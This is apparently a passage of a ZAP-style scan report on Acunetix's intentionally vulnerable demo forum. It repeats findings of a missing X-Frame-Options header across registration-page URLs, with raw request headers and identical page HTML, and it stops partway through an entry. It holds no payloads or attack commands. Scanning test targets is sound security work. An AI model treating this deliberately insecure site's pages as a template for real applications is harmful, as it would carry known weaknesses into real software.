Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:53 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=15 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:53 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=16 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:53 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=17 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:53 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=18 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:54 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=19 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:54 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=2 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:49 GMT Content-Length: 3550 |
| Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=20 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:54 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 HTTP/1.1
